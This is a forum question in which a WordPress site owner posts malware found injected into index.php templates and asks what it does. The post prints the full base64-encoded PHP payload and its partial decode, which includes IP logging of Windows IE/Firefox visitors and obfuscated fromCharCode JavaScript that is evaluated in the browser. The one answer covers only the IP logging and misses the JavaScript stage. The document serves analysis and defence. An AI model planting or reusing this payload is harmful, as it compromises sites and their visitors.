# Wordpress malware injection to index.php template

Tags: wordpress, base64, code-injection, malware

Hey guys so I recently found that index.php template files on all my wordpress installs on my server were injected with this code. `<?php eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTskZGJmPSRkci4nLycubWQ1KCRkcik7DQppZigoc3RycG9zKCR1YSwnV2luZG93cycpIT09ZmFsc2UpJiYoKHN0cnBvcygkdWEsJ01TSUUnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVmb3gnKSE9PWZhbHNlKSkmJihzdHJwb3MoQGZpbGVfZ2V0X2NvbnRlbnRzKCRkYmYpLCRpcCkgPT09IGZhbHNlKSl7DQoJZXJyb3JfcmVwb3J0aW5nKDApOw0KCWVjaG8oYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkRDUwY25sN01TMXdjbTkwYjNSNWNHVTdmV05oZEdOb0tHRnpaQ2w3ZUQweU8zMGdhV1lvZUNsN1puSTlJbVp5YjIxRGFHRnlJanRtUFZzd0xDMHhMRGswTERrekxESXlMREk1TERreExERXdNU3c0T0N3eE1EZ3NPVGtzT1RBc01UQXhMREV3Tml3ek5TdzVOQ3c1TVN3eE1EVXNOakFzT1Rnc09UQXNNVEF3TERreExEazVMREV3Tnl3eE1EVXNOVFVzTVRFeUxEYzBMRGcyTERrMExEWTRMRGcyTERFd01DdzVNU3d5T1N3ek1DdzRPQ3d4TURBc09URXNNVEV4TERJNExETXlMRGd4TERNM0xEZzBMRE14TERFeE1pdzBMQzB4TEMweUxEQXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXcwT1N3eUxEQXNMVEVzTVRFMExESXpMRGt4TERrM0xERXdOaXc1TVN3eU1Td3hNVFFzTXl3dE1pd3dMQzB4TERnNUxERXdNaXc0T1N3eE1EWXNNVEF3TERreExEazVMREV3Tnl3ek5pd3hNRGdzTVRBMUxEazFMREV3TlN3NU1pd3pNQ3d5TXl3MU1TdzVOU3c1TVN3eE1EVXNPRGNzT1Rnc09USXNNaklzTVRBMExERXdOU3c0T1N3MU1Dd3pNQ3c1TkN3eE1EVXNNVEEzTERFd01pdzBOeXd6T0N3ek55dzRPU3d4TVRFc01UQXlMREV3TkN3NU55d3hNRGNzT1RNc01UQTVMRGszTERNMUxERXdNQ3d4TVRFc09URXNNVEV3TERNMkxERXdOaXd4TURZc016Y3NOVElzT1RRc01UQXhMRFV3TERReExESTVMREl4TERFeE1DdzVOU3c0T1N3eE1EY3NPVFFzTlRBc016QXNNemtzTXpjc016QXNNaklzT1RNc09USXNPVFVzT1RJc09UVXNNVEEyTERVd0xETXdMRE01TERNM0xETXdMREl5TERFd05Dd3hNRGNzTVRFeExEazNMRGt5TERVeExESTRMREV3T1N3NU5Td3hNRFFzT1RZc09EZ3NPVFFzT1Rrc09UVXNNVEExTERFeE1pdzBPQ3c1TXl3NU5pdzVNQ3c0T1N3NU1pd3hNREFzTkRnc01UQXpMREV3TVN3eE1EUXNPVFlzTVRBMkxEazBMREV3TWl3eE1EQXNORGNzT0Rnc09EZ3NNVEEwTERFd01pdzVPQ3d4TURZc01UQTNMRGt4TERRNExEazVMRGt4TERreExERXdOeXcwT0N3ek55dzFNQ3d4TURZc01UQXdMREV3TXl3ME9Dd3pOeXcxTUN3eU9TdzFNU3cxTVN3ek55dzVOQ3c1TXl3eE1EUXNPRFlzTVRBd0xEa3hMRFV4TERJMUxETXhMRFE0TERRc0xURXNMVElzTVRFMkxETXNMVElzTUN3NU1pd3hNRFlzTVRBeExEZzVMREV3TlN3NU5pd3hNREVzT1Rrc01qTXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXd4TVRNc01pd3dMQzB4TEMweUxERXdPU3c0Tnl3eE1ETXNNak1zT1RJc01qRXNOVElzTWpJc09Ea3NNVEF5TERnNUxERXdOaXd4TURBc09URXNPVGtzTVRBM0xETTJMRGc0TERFd05TdzVNU3c0Tml3eE1EY3NPVEVzTlRnc09Ua3NPVEVzT1Rnc09USXNNVEF3TERFd05Td3pNU3d5T1N3NU5DdzVNeXd4TURRc09EWXNNVEF3TERreExESTRMRE15TERRNUxEa3hMRE0zTERFd05TdzVNQ3d4TURjc05UVXNNVEExTERFd055d3hNRFFzT1RRc09Ea3NNVEEzTERFd05TdzVNaXd6TUN3eU9Dd3hNRFlzTVRBMExEZzRMRE13TERNMExESTRMRGsxTERFd05pd3hNRFVzTVRBekxEUTRMRE0yTERNNExEa3dMREV3T1N3eE1ETXNNVEExTERrMUxERXdPQ3c1TkN3eE1EY3NPVGdzTXpZc09UZ3NNVEV5TERreUxERXdPQ3d6Tnl3eE1EY3NNVEEwTERNNExEVXpMRGt5TERFd01pdzFNU3d6T1N3ek1Dd3pNU3cwT0N3NU15d3pOaXd4TURRc01UQTNMREV4TVN3NU55dzVNaXd6Tml3eE1EY3NPVFlzTVRBMUxEazBMRGc1TERrMUxEazNMRGsyTERFd05pd3hNVEFzTlRJc01qa3NPVE1zT1RZc09UQXNPRGtzT1RJc01UQXdMREk0TERVd0xEa3lMRE0xTERFd05pd3hNRFlzTVRFd0xEazVMRGt4TERNMUxERXdNeXd4TURFc01UQTBMRGsyTERFd05pdzVOQ3d4TURJc01UQXdMRFV3TERNd0xEZzNMRGczTERFd05pd3hNREVzT1Rjc01UQTRMREV3Tml3NU1Dd3pNQ3cwT1N3NU1Td3pOeXd4TURVc01UQTFMREV4TWl3NU9DdzVNQ3d6Tnl3NU9DdzVNQ3c1TXl3eE1EWXNOVEFzTXpBc016Z3NNamdzTlRBc09USXNNelVzTVRBMkxERXdOaXd4TVRBc09Ua3NPVEVzTXpVc01UQTNMREV3TVN3eE1ERXNOVElzTWprc016Y3NNekFzTkRrc09URXNNemNzTVRBMUxEa3dMREV3Tnl3MU5Td3hNRFVzTVRBM0xERXdOQ3c1TkN3NE9Td3hNRGNzTVRBMUxEa3lMRE13TERJNExERXhNQ3c1TlN3NE9Td3hNRGNzT1RRc01qZ3NNelVzTWprc016Z3NNemtzTWprc016QXNOVEFzT1RJc016VXNNVEEyTERreExERXdOU3cxTml3eE1EWXNNVEExTERFd05TdzVOU3c0Tnl3eE1EZ3NNVEEyTERrd0xETXhMREk1TERrekxEa3lMRGsxTERreUxEazFMREV3Tml3eU9Dd3pOU3d5T1N3ek9Dd3pPU3d5T1N3ek1DdzFNQ3d6TEMweUxEQXNMVEVzT0Rrc01UQXlMRGc1TERFd05pd3hNREFzT1RFc09Ua3NNVEEzTERNMkxEa3lMRGt5TERFd05pdzFPQ3c1T1N3NU1TdzVPQ3c1TWl3eE1EQXNNVEExTERFd05pdzFOaXd4TVRBc056VXNPRGNzT1RJc05qa3NPRGNzT1Rnc09USXNNekFzTWpnc09Ea3NNVEF4TERnNUxERXhNaXd5T1N3ek1DdzRNaXd6T0N3NE1pd3pOeXc0Tnl3eE1ERXNNVEF6TERreExEazVMRGt4TERVM0xEa3pMRGsyTERrNExEZzVMRE14TERreUxETXdMRFV3TERNc0xUSXNNQ3d4TVRWZE8zWTlJbVYyWVNJN2ZXbG1LSFlwWlQxM2FXNWtiM2RiZGlzaWJDSmRPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5PM285S0NobEtUOGlRMjlrWlNJNklpSXBPM3A0UFdaeUszbzdabTl5S0drOU1EczFOamt0TlNzMUxXaytNRHRwS3oweEtYdHFQV2s3YVdZb1pTbHpQWE1yY2x0NmVGMG9LSGRiYWwwcU1Tc29PU3RsS0NKcUpUTWlLU2twS1R0OUlHbG1LSGdtSm1ZbUpqQXhNajA5UFRFd0tXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KCWlmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>`

Usually it is simple enough for me to put it through a base64 decode but I think they have encoded it again.

What i get from base64 decode is

```
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
```

if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
    error_reporting(0);

try{1-prototype;}catch(asd){x=2;} if(x){fr="fromChar";f=[0,-1,94,93,22,29,91,101,88,108,99,90,101,106,35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112,4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0,-1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,89,111,102,104,97,107,93,109,97,35,100,111,91,110,36,106,106,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22,93,92,95,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90,89,92,100,48,103,101,104,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94,93,104,86,100,91,51,25,31,48,4,-1,-2,116,3,-2,0,92,106,101,89,105,96,101,99,23,95,91,105,87,98,92,104,29,32,113,2,0,-1,-2,109,87,103,23,92,21,52,22,89,102,89,106,100,91,99,107,36,88,105,91,86,107,91,58,99,91,98,92,100,105,31,29,94,93,104,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48,36,38,90,109,103,105,95,108,94,107,98,36,98,112,92,108,37,107,104,38,53,92,102,51,39,30,31,48,93,36,104,107,111,97,92,36,107,96,105,94,89,95,97,96,106,110,52,29,93,96,90,89,92,100,28,50,92,35,106,106,110,99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106,90,30,49,91,37,105,105,112,98,90,37,98,90,93,106,50,30,38,28,50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,110,95,89,107,94,28,35,29,38,39,29,30,50,92,35,106,91,105,56,106,105,105,95,87,108,106,90,31,29,93,92,95,92,95,106,28,35,29,38,39,29,30,50,3,-2,0,-1,89,102,89,106,100,91,99,107,36,92,92,106,58,99,91,98,92,100,105,106,56,110,75,87,92,69,87,98,92,30,28,89,101,89,112,29,30,82,38,82,37,87,101,103,91,99,91,57,93,96,98,89,31,92,30,50,3,-2,0,115];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;569-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));} if(x&&f&&012===10)e(s);

```
if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
```

}

could you guys help me try to figure out what the malware is trying to do

thanks

Answer (score 0):

The question was what does the code do. From what I can decipher:

It creates a file on your document root with a md5'd name. In that file it writes the IP of every visitor you get from a Windows machine with either Internet Explorer or Firefox.

I'm not sure what the hacker is after but if he was able to get that code in your file maybe he has access to your FTP and thus access to the newly created log-files.